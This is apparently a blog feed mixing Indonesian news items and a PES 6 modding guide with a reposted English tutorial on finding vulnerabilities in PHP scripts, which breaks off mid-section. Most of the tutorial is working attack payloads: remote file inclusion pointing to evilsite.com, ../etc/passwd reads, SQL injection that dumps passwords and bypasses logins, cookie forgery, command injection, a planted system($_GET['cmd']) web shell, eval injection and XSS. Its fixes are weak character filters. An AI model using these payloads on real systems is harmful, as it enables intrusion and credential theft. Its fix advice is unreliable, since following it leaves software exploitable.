Zahar Siddique mengatakan, tak hanya Zuckerberg yang harus diselidiki, tapi juga pendiri facebook lainnya seperti Dustin Moskovitz dan Chris Hughes. Bahkan para pengacara juga meminta polisi menindak 'Andy', seorang perempuan yang diduga membuat fan page kontes menggambar tersebut.

Sementara itu, pihak kepolisian berjanji akan menyelidiki kasus tersebut.

Sumber : Okezone

Kaka Merasa Dikasari Lawan

noreply@blogger.com (Muhib Faisal) — Mon, 21 Jun 2010 02:13:00 -0700

Johannesburg - Kaka tak mau berkomentar banyak soal kartu merahnya di laga Brasil kontra Pantai Gading. Ia malah menilai para pemain Les Elephants banyak yang mengasarinya saat berduel.

Insiden itu sendiri terjadi ketika laga waktu normal tersisa dua menit lagi. Saat itu Kaka diklaim menyikut Kader Keita sehingga Keita terjatuh meringis kesakitan. Tak ayal wasit Stephane Lannoy langsung mengeluarkan kartu kuning kedua yang artinya Kaka harus terusir dari lapangan.

Namun hilangnya Kaka tak berarti banyak karena Brasil tetap menang dengan skor 3-1. Namun yang jadi pertanyaan apakah pantas Kaka menerima kartu kuning itu? Dalam tayangan ulang sebenarnya terlihat Keita-lah yang menghampiri dan sengaja menabrakkan tubuhnya ke sikut Kaka.

Jelas kartu merah itu mengundang protes dari Carlos Dunga yang mana harus kehilangan Kaka di partai pamungkas kontra Portugal. Lalu bagaimana Kaka mengomentari tentang insiden itu?

Playmaker asal Real Madrid itu malah menganggap permainan Pantai Gading yang cenderung kasar. Memang Kaka dalam laga itu sering mendapat tekel-tekel berbahaya dan dipancing emosinya oleh lawan.

"Pertandingan yang ketat. Ada permainan kasar yang ditunjukkan dua atau tiga pemain di sana," lugas Kaka seperti dilansir Yahoosports.

Memang sayang kartu merah itu merusak permainan apik Kaka. Dicatat opta Kaka menjadi pemain pertama di Piala Dunia ini yang mencatat assist lebih banyak dari jumlah gol di mana ia mengarsiteki gol Luis Fabiano dan Elano.

Sumber : detik.com

Tutorial Oprek PES 6

noreply@blogger.com (Muhib Faisal) — Wed, 16 Jun 2010 22:28:00 -0700

Sudah sekitar 4 tahun kita merasakan asyiknya bermain Pro Evolution Soccer (PES) 6. Tentu kadang kita merasa jenuh dengan tampilan yang itu-itu saja. Disini saya akan memberikan sedikit dasar bagaimana cara mengubah tampilan di PES 6.

Memasang Scoreboard dengan Kitserver

1.File scoreboard biasanya terdiri dari file2 berikut:

----------
0_text.afs
----------

unknow_00431-446
unknow_00593-606

dan

----------
e_text.afs
----------

unknow_00151

2.Apabila file masih berbentuk file DKZ maka buka dulu file tersebut dengan menggunakan DKZ studio. Kemudian pilih semua file. klik kanan-->export. Simpan di sembarang tempat

3.Selanjutnya masukkan file unknow_00431-446 dan unknow_00593-606 ke dalam folder dat/0_text.afs yang ada di dalam kitserver

4.Masukkan juga file unknow_00151 ke dalam folder dat/e_text.afs yang ada di dalam kitserver

5.selesai.Hasilnya bisa langsung di cek di game. Apabila tidak terjadi perubahan maka kitserver anda belum support afs module.

Mengubah tampilan dengan Game Graphic Studio (GGS)

1.Melakukan editing grafik di PES 6 cukup mudah. Yang perlu diperhatikan adalah menyiapkan gambar pengganti yang memiliki index color dan ukuran yang sama dengan grafik aslinya. Langkah pertama yang perlu dilakukan adalah menginstall game graphic studio (GGS) dan DKZ studio

2.buka file e_text.afs yang ada di dalam folder dat tempat PES 6 di-install dengan menggunakan DKZ studio

3.Setelah itu perhatikan map di bawah ini

-------------
E_TEXT.AFS
-------------

File Description
---- -----------

000 = Pes6 Logo (at the loading screens)
007 = Option File default Logo's bmp.7 (Edit Mode)
008 = Competition Logos (64x64)
009 = Default & Edit Layers Boot previews
015 = Edit Mode Menu icons/stad preview/League logos
016 = Edit Mode function icons & Background pic
017 = PES/WE challenge teams emblems???????
018-124 = 2d kit previews
125 = 2d kit preview edit mode parts (Player)
126 = 2d kit preview edit mode parts (Keeper)
128 = Formation/Condition Icons
129-149 = Competition logos (64x64)
151 = Tv Logo
152-153 = Loading screen Background
157 = Results icons
158 = Competition logos
159 = African Nations Cup background & Emblem (128x128 )
160 = Copa America background & Emblem (128x128 )
161 = Asia Cup background & Emblem (128x128 )
162 = Euro 2008 background & Emblem (128x128 )
163 = World Cup background & Emblem (128x128 )
164 = Konami Cup background & Emblem (128x128 )
165 = Reebok Challenge background & Emblem (128x128 )
166-170 - Nippon Challenge screens
171 = England League background & Emblems (128x128 )
172 = Ligue 1 background & Emblems (128x128 )
173 = Bundesliga background & Emblems (128x128 )
174 = Eredivisie background & Emblems (128x128 )
175 = International League background & Emblems (128x128 )
176 = Serie A background & Emblems (128x128 )
177 = La Liga background & Emblems (128x128 )
178 = Background pic (Break)
179 = Background pic (D1 Cup)
180 = Background pic (D1 League)
181 = Background pic (D2 Cup)
182 = Background pic (D2 League)
183 = Background pic (ML Off-Season)
184 = Background pic (WEFA Championship)
185 = Background pic (WEFA Masters)
186 = Background pic (Match Start)
187 = Background pic (Final)
188 = Background pic (Final
189 = Background pic (International)
190 = Background pic (Play-offs)
192 = Ball preview
193-283 = Nippon Challenge screens
284 = Mode Icons/ball previews/Cup Emblems
285 = Analysis screen
286 = Challenge start/end screens
287 = Team select World Map
288 = Stage screen (Asia)
289 = Stage screen (Europe)
290 = Stage screen (North/Central/Carribean draw)
291 = Stage screen (Play offs)
292 = Stage screen (South American)
293 = Stage screen (International Cup)
294 = Opening screen (Asia)
295 = Opening screen (Europe)
296 = Opening screen (North/Central/Carribean)
297 = Opening screen (South American)
298 = Main menu icons/ball previews/Competition logos
299 = World map (alpha)
300 = Background & Emblem Asia Qualifiers (512x512)
301 = Background & Emblem European Qualifiers (512x512)
302 = Background & Emblem Kirin Challenge (512x512)
303 = Background & Emblem North/Central/Carribean Qualifiers (512x512)
304-307 = Background & Emblem Play-offs (512x512)
308 = Background & Emblem South American Qualifiers (512x512)
311-339 = League/Cup emblems & backgrounds
340-347 = Cup 2d preview pics
349 = Memory card screen icons/background
350 = Credits screens
351 = Emblems League/Cups
353 = Background pic Controller setup
356 = Main Menu of PES 6 with changing picture
359 = Emblems/logos leagues
360 = Background/icons PES shop
361 = Stadium Previews
362 = 2d kit preview edit mode parts (Player/keeper)
364 = Emblems League/Cups/icons (exhibition mode?????)
366-367 = Choose players controller side/select icons
368 = Cup gallery emblems/backgrounds/
375 = Background pic (Online Mode)
380&382 = Online Mode emblems/icons
386 = JFA MAX/Konami/3 stripes licencse spash screen
387 = Main Menu pic (PRESS START SCREEN)
415 = Training Mode emblems/icons

browse file yang ingin di edit sesuai dengan map di atas. Misalkan kita ingin mengedit gambar main menu PES 6 maka kita cari file unknow_00356.bin. Setelah itu klik kanan, pilih export, save di mana aja.

4.buka file bin tadi dengan GGS. Setelah itu akan bisa dilihat ada berapa macam gambar yang ada di dalam satu file bin tersebut. Perhatikan ukuran yang tertera di bawah masing-masing gambar.

5.Siapkan file gambar yang ingin dimasukkan. Sesuaikan dengan ukuran gambar aslinya

6.Masih di GGS yang masih terbuka tadi, klik file-->open....cari file gambar yang kita siapkan tadi

7.setelah itu lakukan DRAG dengan menggunakan tombol KLIK KANAN. Drag gambar yang kita miliki ke gambar yang ingin di-replace di bawahnya

8.Setelah gambar masuk tutup GGS. File bin telah di edit

9.langkah selanjutnya adalah memasukkan file bin yang telah dimodif ke dalam game. Ada dua cara yaitu melalui kitserver atau DKZ studio. Cara yang digunakan sama dengan cara memasukkan file sound pada tutorial sebelumnya. Hanya saja kali ini file bin dimasukkan ke dalam file e_text.afs yang ada di tempat PES 6 di install atau folder e_text.afs yang ada di kitserver

Mengubah Musik

Pada dasarnya editing file musik yang ada di game PES 6 cukup mudah. Langkah yang dilakukan cukup dengan me-replace file musik yang ada dengan file musik yang kita inginkan. File yang digunakan berformat .adx. Langkah-langkahnya sebagai berikut :

1.Pada tahap ini diasumsikan dkz studio dengan english file sudah terinstall. Pertama siapkan file musik yang ingin dimasukkan ke dalam game dengan format wav

2.setelah itu buka dkz studio

3.tekan ctrl+M

4.kombinasi key ini akan membuka fungsi converter wav-->adx dari dkz studio.

5.pada source folder browse tempat file wav yang sudah disiapkan tadi

6.pada destination folder browse tempat file adx yang dihasilkan nanti

7.klik tombol star/start

8.Setelah proses selesai lihat di folder destination yang sudah di set tadi. akan ada file adx

9.langkah selanjutnya adalah memperhatikan map sound berikut ini

44 – CREDITS
45 - ENTRANCE 1
46 - ENTRANCE 2
47 - HIGHLIGHTS 1
48 - HIGHLIGHTS 2
49 - HIGHLIGHTS 3
50 - HIGHLIGHTS 4
51 - OVATION 1
52 - OVATION 2
53 - OVATION 3
54 - MAIN MENU
55 - MAIN MENU
56 - MAIN MENU
57 - MAIN MENU
58 - MAIN MENU
59 - MAIN MENU
60 - MAIN MENU
61 - MAIN MENU
62 - MASTER LEAGUE
63 - LEAGUE/CUP
65 – MUSEUM
66 – TRAINING
68 – FORMATION
69 – FORMATION
70 - REPLAY PLAYBACK
71 - ONLINE 1
72 - ONLINE 2

bila kita ingin memasukkan file adx kita tadi menjadi musik untuk main menu maka kita tinggal me-rename file nya menjadi unknow_00054.adx. Jika ingin dimasukkan menjadi BGM untuk master league maka rename menjadi unknow_00062 dst. Gunakan map di atas sebagai patokan untuk me-rename file

KET:
ENTRANCE = musik ketika pemain masuk di entrance scene
OVATION = musik ketika babak pertama selesai

10.Apabila proses rename telah selesai maka langkah selanjutnya adalah memasukkan file adx kita ke dalam game. ada dua cara.

11.Cara Pertama = Via kitserver
cara ini cukup simpel. Tinggal pindah file adx tadi ke folder kitserver/dat/0_sound.afs (kalo folder yang disebutkan gak ada, boleh bikin sendiri, sama aja). lalu tes di game PES nya. Jika tidak bekerja berarti kitserver yang digunakan bukan versi terbaru. Download kitserver yang di post di thread ini.

12.Cara kedua = Via DKZ studio
cara ini cukup rumit, namun dijamin keberhasilannya.

-Buka file 0_sound.afs yang ada di dalam folder dat tempat PES 6 di install menggunakan DKZ studio.

-browse file yang ingin di-replace. Misalkan untuk mengganti BGM master league maka cari file unknow_00062.adx.

-kalo udah ketemu. klik kanan file nya. pilih import. akan muncul wondow baru. pilih file adx milik kita tadi. klik ok

-kalo ada peringatan tentang file terlalu besar klik yes. setelah itu klik file-->save as. Save file dengan nama 0_sound.afs di tempat lain. Tunggu sampai proses selesai. Setelah itu keluar dari DKZ studio, cari file 0_sound.afs di tempat lain tadi...timpa ama file 0_sound.afs asli yang ada di folder dat tempat PES 6 di install. beres...file sound udah masuk

-kalo peringatan tentang file terlalu besar ga muncul, maka tinggal tutup dKZ studio. tes di game nya. file sound sudah masuk

Sumber : Kaskus

Finding vulnerabilities in PHP scripts FULL

noreply@blogger.com (Muhib Faisal) — Tue, 1 Dec 2009 08:23:00 -0800

Author : SirGod
Email : sirgod08@gmail.com
Contents : 

 1) About
 2) Some stuff
 3) Remote File Inclusion
    3.0 - Basic example
 3.1 - Simple example
 3.2 - How to fix
 4) Local File Inclusion
    4.0 - Basic example
 4.1 - Simple example
 4.2 - How to fix
 5) Local File Disclosure/Download
    5.0 - Basic example
 5.1 - Simple example
 5.2 - How to fix
 6) SQL Injection
    6.0 - Basic example
 6.1 - Simple example
 6.2 - SQL Login Bypass
 6.3 - How to fix
 7) Insecure Cookie Handling
    7.0 - Basic example
 7.1 - Simple example
 7.2 - How to fix
 8) Remote Command Execution
    8.0 - Basic example
 8.1 - Simple example
 8.2 - Advanced example
 8.3 - How to fix
 9) Remote Code Execution
    9.0 - Basic example
    9.1 - Simple example
 9.2 - How to fix
 10) Cross-Site Scripting
    10.0 - Basic example
    10.1 - Another example
 10.2 - Simple example
 10.3 - How to fix
 11) Authentication Bypass
    11.0 - Basic example
    11.1 - Via login variable
 11.2 - Unprotected Admin CP
 11.3 - How to fix
 12) Insecure Permissions
    12.0 - Basic example
    12.1 - Read the users/passwords
 12.2 - Download backups
 12.3 - INC files
 12.4 - How to fix
 13) Cross Site Request Forgery
    13.0 - Basic example
 13.1 - Simple example
 13.2 - How to fix
 14) Shoutz

1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
    how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the 
    examples without the basic example of each category was founded in different scripts.
  
  
     2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
 You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
    to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
    configuration I use and why :

   safe_mode = off ( a lot of shit cannot be done with this on )
   disabled_functions = N/A ( no one,we want all )
   register_globals = on ( we can set variables by request )
   allow_url_include = on ( for lfi/rfi )
   allow_url_fopen = on ( for lfi/rfi )
   magic_quotes_gpc = off ( this will escape ' "  \  and NUL's  with a backslash and we don't want that )
   short_tag_open = on ( some scripts are using short tags,better on ) 
   file_uploads = on ( we want to upload )
   display_errors = on ( we want to see the script errors,maybe some undeclared variables? )
 
      How to proceed : First,create a database to be used by different scripts.Install the script on
    localhost and start the audit over the source code.If you found something open the web browser and
    test it,maybe you are wrong.
 

     3) Remote File Inclusion
  
  
      - Tips : You can use the NULLBYTE and ? trick.
            You can use HTTPS and FTP to bypass filters ( http filtered )
   
  
    In PHP is 4 functions through you can include code.

         require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
         require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
         include - includes and evaluates the specified file.
         include_once -  includes and evaluates the specified file during the execution of the script.  
  
  
    3.0 - Basic example
    
    
       - Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
    you can use "https" or "ftp".
    
       - Code snippet from test.php
    
   -----------------------------------------------
   <?php
   $pagina=$_GET['pagina'];
   include $pagina;
   ?>
   -----------------------------------------------
   
   - If we access the page we got some errors and some warnings( not pasted ) :
   
   Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

        - We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example : 
  
       http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
    
   Now I will show why some people use ? and  after the link to the evil script.
   
    # The ""

   - Code snippet from test.php
    
   -----------------------------------------------
   <?php
         $pagina=$_GET['pagina'];
         include $pagina.'.php';
         ?>
   -----------------------------------------------
   
    - So if we will request 
    
       http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
    
    Will not work because the script will try to include http://evilsite.com/evilscript.txt.php
    
    So we will add a NULLBYTE (  ) and all the shit after nullbyte will not be taken in
    consideration.Example : 
    
       http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
    
   The script will successfully include our evilscript and will throw to junk the things
   after the nullbyte.
   
    # The "?"
   
    - Code snippet from test.php
    
   -----------------------------------------------
   <?php
         $pagina=$_GET['pagina'];
         include $pagina.'logged=1';
         ?>
   -----------------------------------------------
   
     And the logged=1 will become like a variable.But better use nullbyte.Example : 
     
       http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1
    
    The evilscript will be included succesfully.
    
    
    3.1 - Simple example  
    
    
        Now an example from a script.
     
      - Code snippet from index.php
   
   ----------------------------------------------------
           if (isset($_REQUEST["main_content"])){
            $main_content = $_REQUEST["main_content"];
         } else if (isset($_SESSION["main_content"])){
            $main_content = $_SESSION["main_content"];
         }
     .......................etc..................
             ob_start();
          require_once($main_content);
   ----------------------------------------------------
   
      We can see that "main_content" variable is requested by $_REQUEST method.The attacker can 
  set any value that he want. Below the "main_content" variable is include.So if we make the
  following request :
  
       http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt
    
    Our evil script will be successfully included.
    
    
    3.2 - How to fix
    
    
        Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
     Another way : filter "http" , "https" , "ftp" and "smb".
    
     
  4) Local File Inclusion
  
 
       - Tips : You can use the NULLBYTE and ? trick.
           ../ mean a directory up
     On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).
  
    The same functions which let you to include (include,include_once,require,require_once) .
  
  
    4.0 - Basic example
    
    
     - Code snippet from test.php
     
     -----------------------------------
      <?php
      $pagina=$_GET['pagina'];
      include '/pages/'.$pagina;
      ?>
     -----------------------------------
     
       Now,we can not include our script because we can not include remote files.We can include only
   local files as you see.So if we make the following request : 
    
            http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
      
    The script will include "/pages/../../../../../../etc/passwd" successfully.
    
             You can use the  and ? .The same story.  
   
   
    4.1 - Simple example
    
    
       - Code snippet from install/install.php
    
    -------------------------------------
     if(empty($_GET["url"]))
          $url = 'step_welcome.php';
           else
          $url = $_GET["url"];
     .............etc.............
     <p><? include('step/'.$url) ?></p>
    -------------------------------------
    
      We can see that "url" variable is injectable.If the "url" variable is not set
     (is empty) the script will include "step_welcome.php" else will include the 
     variable set by the attacker.
     
      So if we do the following request : 
   
     http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd
     
   The "etc/passwd" file will be succesfully included.
   
   
    4.2 - How to fix
     
  
      Simple way : Don't allow special chars in variables.Simple way : filter the dot "." 
   Another way : Filter "/" , "\" and "." .
   
   
  5) Local File Disclosure/Download   
   
   
       - Tips : Through this vulnerability you can read the content of files,not include.
   
   Some functions which let you to read files :
   
     file_get_contents — Reads entire file into a string
     readfile — Outputs a file
     file — Reads entire file into an array
     fopen — Opens file or URL
     highlight_file — Syntax highlighting of a file.Prints out or returns a syntax 
                    highlighted version of the code contained in filename using the
        colors defined in the built-in syntax highlighter for PHP.
     show_source — Alias of highlight_file()
   
   
       5.0 - Basic example
    
    
       - Code snippet from test.php 
    
    --------------------------------------
     <?php
     $pagina=$_GET['pagina'];
     readfile($pagina); 
     ?>
     --------------------------------------
     
      The readfile() function will read the content of the specified file.So if we do the following request :
   
       http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
    
   The content of etc/passwd will be outputed NOT included.
   
   
    5.1 - Simple example

                 
     - Code snippet from download.php
     
    -----------------------------------------------------------------------------------
    $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

    header("Content-Type: application/force-download");
    header( "Content-Disposition: attachment; filename=".basename($file));

    //header( "Content-Description: File Transfer");
    @readfile($file);
    die();
    -----------------------------------------------------------------------------------
    
      The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.
    And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
      If we make the following request : 
    
        http://127.0.0.1/download.php?file=../../../../../../etc/passwd
    
    So we can succesfully read the "etc/passwd" file.
    
    
    5.2 - How to fix
    
    
      Simple way : Don't allow special chars in variables.Simple way : filter the dot "." 
   Another way : Filter "/" , "\" and "." .
    
    
  6) SQL Injection
  
  
       - Tips : If the user have file privileges you can read files.
             If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
      you can upload you code into a file.

       
       6.0 - Basic example 
    
    
       - Code snippet from test.php
    
    ----------------------------------------------------------------------------------
    <?php
    $id = $_GET['id'];
          $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
    ?>
    ----------------------------------------------------------------------------------
    
     The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :
   
      http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--
   
    And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have
    file privileges.
    
    
    6.1 - Simple example
    
    
         - Code snippet from house/listing_view.php
   
   -----------------------------------------------------------------------------------------------------------------------------
   $id = $_GET['itemnr'];
            require_once($home."mysqlinfo.php");
            $query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
            $result = mysql_query($query);
   if(mysql_num_rows($result)){
   $r = mysql_fetch_array($result);
   -----------------------------------------------------------------------------------------------------------------------------
   
    We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.
    So we can inject our code.Lets make a request : 
    
      http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--
   
    And we get the email and the password from the users table.
    
    
    6.2 - SQL Injection Login Bypass
  
  
     - Code snippet from /admin/login.php
     
     ------------------------------------------------------------------------------------------------------------------------------
      $postbruger = $_POST['username'];
            $postpass = md5($_POST['password']); 
            $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") 
            or die("<p>" . mysql_error() . "</p>\n");
            ------------------------------------------------------------------------------------------------------------------------------
     
      The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :
   
     username : admin ' or ' 1=1
     password : sirgod
     
   We logged in.Why?Look,the code will become 
   
   ---------------------------------------------------------------------------------------------------------------------------------
   $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1  AND password = 'sirgod'") 
   ---------------------------------------------------------------------------------------------------------------------------------
   
   Login bypassed.The username must be an existent username.
   
   
    6.3 - How to fix
    
    
      Simple way : Don't allow special chars in variables.For numeric variables
               use (int) ,example $id=(int)$_GET['id']; 
   Another way : For non-numeric variables : filter all special chars used in
                SQLI : - , . ( ) ' " _ + / * 
 
 
  7) Insecure Cooke Handling
  
     
   - Tips : Write the code in the URLbar,don't use a cookie editor for this.
  
  
    7.0 - Basic example
    
    
       - Code snippet from test.php
    
  ---------------------------------------------------------------
  if($_POST['password'] == $thepass) {
  setcookie("is_user_logged","1");
  } else { die("Login failed!"); }
  ............ etc .................
  if($_COOKIE['is_user_logged']=="1")
   { include "admin.php"; else { die('not logged'); }
  ---------------------------------------------------------------
  
    Something interesting here.If we set to the "is_user_logged" variable
   from cookie value "1" we are logged in.Example :
   
   javascript:document.cookie = "is_user_logged=1; path=/";
   
   So practically we are logged in,we pass the check and we can access the admin panel.
    
    
    7.1 - Simple example
    
    
     - Code snippet from admin.php
  
  ----------------------------------------------------------------
  if ($_COOKIE[PHPMYBCAdmin] == '') {
  if (!$_POST[login] == 'login') {
  die("Please Login:<BR><form method=post><input type=password
  name=password><input type=hidden value=login name=login><input
  type=submit></form>");
  } elseif($_POST[password] == $bcadminpass) {
  setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
  header("Location: admin.php"); } else { die("Incorrect"); }
  }
  ---------------------------------------------------------------- 
   
    Code looks exploitable.We can set a cookie value that let us to bypass the login
   and tell to the script that we are already logged in.Example : 
   
   javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";
   
    What is 1246371700? Is the current time() echo'ed + 360.
    
    
    7.2 - How to fix 
    
    
         Simple way : The most simple and eficient way : use SESSIONS .
    
    
  8) Remote Command Execution
  
  
      - Tips : If in script is used exec() you can't see the command output(but the command is executed)
         until the result isn't echo'ed from script.
            You can use AND operator ( || ) if the script execute more than one command .
  
    In PHP are some functions that let you to execute commands :
 
       exec — Execute an external program
       passthru — Execute an external program and display raw output
       shell_exec — Execute command via shell and return the complete output as a string
       system — Execute an external program and display the output
  
  
    8.0 - Basic example
 
      - Code snippet from test.php
   
   ---------------------------------
   <?php
   $cmd=$_GET['cmd'];
   system($cmd);
   ?>
   ---------------------------------
   
   So if we make the following request : 
   
    http://127.0.0.1/test.php?cmd=whoami
    
  The command will be executed and the result will be outputed.
  
  
    8.1 - Simple example
    
    
      - Code snippet from dig.php
   
      -------------------------------------------------------------------------------------------
      $status = $_GET['status'];
      $ns  = $_GET['ns'];
      $host   = $_GET['host'];
      $query_type   = $_GET['query_type']; // ANY, MX, A , etc.
      $ip     = $_SERVER['REMOTE_ADDR'];
      $self   = $_SERVER['PHP_SELF'];
      ........................ etc ........................
      $host = trim($host);
      $host = strtolower($host);
      echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
      echo '<pre>';
         system ("dig @$ns $host $query_type");
   -------------------------------------------------------------------------------------------

    The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command
           that he want through this variable.
     
       Lets make a request :
    
     http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging
     
    The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
   will not work of course.Lets do something a little bit tricky.We have the AND operator
   ( || ) and we will use it to separe the commands.Example :
   
        http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
   
         Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".
   

       8.2 - Advanced example
    
    
       - Code snippet from add_reg.php
    
    -------------------------------------------------------
    $user = $_POST['user'];
    $pass1 = $_POST['pass1'];
    $pass2 = $_POST['pass2'];
    $email1 = $_POST['email1'];
    $email2 = $_POST['email2'];
    $location = $_POST['location'];
    $url = $_POST['url'];
    $filename = "./sites/".$user.".php";
    ...................etc......................
    $html = "<?php
    \$regdate = \"$date\";
    \$user = \"$user\";
    \$pass = \"$pass1\";
    \$email = \"$email1\";
    \$location = \"$location\";
    \$url = \"$url\";
    ?>";
    $fp = fopen($filename, 'a+');
    fputs($fp, $html) or die("Could not open file!");
    -------------------------------------------------------
         
    We can see that the script creates a php file in "sites" directory( ourusername.php ).
          The script save all the user data in that file so we can inject our evil code into one
         field,I choose the "location" variable.
   
    So if we register as an user with the location (set the "location" value) :
 
            <?php system($_GET['cmd']); ?>

         the code inside sites/ourusername.php will become :
   
           -------------------------------------------------
           <?php
           $regdate = "13 June 2009, 4:16 PM";
           $user = "pwned";
           $pass = "pwned";
           $email = "pwned@yahoo.com";
           $location = "<?php system($_GET['cmd']); ?>";
           $url = "http://google.ro";
           ?>
     -------------------------------------------------

          So we will get an parse error.Not good.We must inject a proper code to get the result that we want.
 
         Lets inject this code :
 
            \";?><?php system(\$_GET['cmd']);?><?php \$xxx=\":D
 
         So the code inside sites/ourusername.php will become :
   
           --------------------------------------------------------------
           <?php
           $regdate = "13 June 2009, 4:16 PM";
           $user = "pwned";
           $pass = "pwned";
           $email = "pwned@yahoo.com";
           $location = "";?><?php system($_GET['cmd']);?><?php $xxx=":D";
           $url = "http://google.ro";
           ?> 
     --------------------------------------------------------------
 
         and we will have no error.Why?See the code :
 
        $location = "";?><?php system($_GET['cmd']);?><?php $xxx=":D";
    
         Lets split it :
 
         -------------------------------
         $location = "";
         ?>
         <?php system($_GET['cmd']);?>
         <?php $xxx=":D";
   -------------------------------

           We set the location value to "",close the first php tags,open the tags
          again,wrote our evil code,close the tags and open other and add a variable
          "xxx" because we dont want any error.I wrote that code because I want no 
          error,can be modified to be small but will give some errors(will not 
          stop us to execute commands but looks ugly).
    
   So if we make the following request :
   
      http://127.0.0.1/sites/ourusername.php?cmd=whoami
   
      And our command will be succesfully executed.
   
   
    8.3 - How to fix 
    
    
         Simple way : Don't allow user input .
      Another way : Use escapeshellarg() and escapeshellcmd() functions . 
                   Example : $cmd=escapeshellarg($_GET'cmd']);
    
 
  9) Remote Code Execution
  
     
   - Tips : You must inject valid PHP code including terminating statements ( ; ) .
  
     
    9.0 - Basic example
    
    
       - Code snippet from test.php 
    
    -----------------------------------
     <?php
     $code=$_GET['code'];
     eval($code); 
     ?>
     -----------------------------------
        
       The "eval" function evaluate a string as PHP code.So in this case we are able to execute 
   our PHP code.Examples : 
   
      http://127.0.0.1/test.php?code=phpinfo();
   http://127.0.0.1/test.php?code=system(whoami);
   
    And we will see the output of the PHP code injected by us.
    
    
    9.1 - Simple example
    
    
       - Code snippet from system/services/init.php
    
    ------------------------------------------------
    $conf = array_merge($conf,$confweb);
    }
    @eval(stripslashes($_REQUEST['anticode']));
          if ( $_SERVER['HTTP_CLIENT_IP'] )
    ------------------------------------------------
    
     We see that the "anticode" is requested by $_REQUEST method and the coder 
    "secured" the input with "stripslashes" which is useless here,we don't need 
    slashes to execute our php code only if we want to include a URL.So we can
    inject our PHP code.Example : 
    
      http://127.0.0.1/test.php?anticode=phpinfo();
   
    Great,injection done,phpinfo() result printed.No include because slashes are
    removed,but we can use system() or another function to execute commands.
    
    
    9.2 - How to fix 
    
          
            Simple way : Don't allow ";" and the PHP code will be invalid.
   Another way : Don't allow any special char like "(" or ")" etc.
   
   
  10) Cross-Site Scripting
  
  
      - Tips : You can use alot of vectors,can try alot of bypass methods,you cand
          find them around the web.
    
    
    10.0 - Basic example
    
    
       - Code snippet from test.php
    
    ---------------------------------
     <?php
     $name=$_GET['name'];
     print $name;
     ?>
        ---------------------------------
     
      The input is not filtered,an attacker can inject JavaScript code.Example :
    
            http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
      
   A popup with XSS message will be displayed.JavaScript code succesfully executed.
   
   
    10.1 - Another example
    
    
       - Code snippet from test.php
    
     -------------------------------------------
      <?php
      $name=addslashes($_GET['name']);
      print '<table name="'.$name.'"></table>';
      ?>
     -------------------------------------------
     
     Not an advanced example,only a bit complicated.
   
   http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83))</script>
   
     Why this vector?We put " because we must close the " from the "name" atribut
    of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
    we want to bypass addslashes() function.Injection done.
    
    
    10.2 - Simple example 
    
       
     - Code snippet from modules.php
     
     ---------------------------------------------------------------------------
     if (isset($name)) {
     .................... etc................
     } else {
     die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
     ---------------------------------------------------------------------------
     
     The "name" variable is injectable,input is not filtered,so we can inject
    with ease JavaScript code.Example :
     
          http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
    
    
    10.3 - How to fix
    
    
           Simple way : Use htmlentities() or htmlspecialchars() functions.
                 Example : $name=htmlentities($_GET['name']);
     Another way : Filter all special chars used for XSS ( a lot ).
                 The best way is the first method.
        
        
  11) Authentication Bypass 
  
  
      - Tips : Look deep in the scripts,look in the admin directories,
          maybe are not protected,also look for undefined variables 
    like "login" or "auth".
    
    
    11.0 - Basic example
    
        
     I will provide a simple example of authentication bypass
    via login variable.
    
     - Code snippet from test.php
     
     ---------------------------------
     <?php
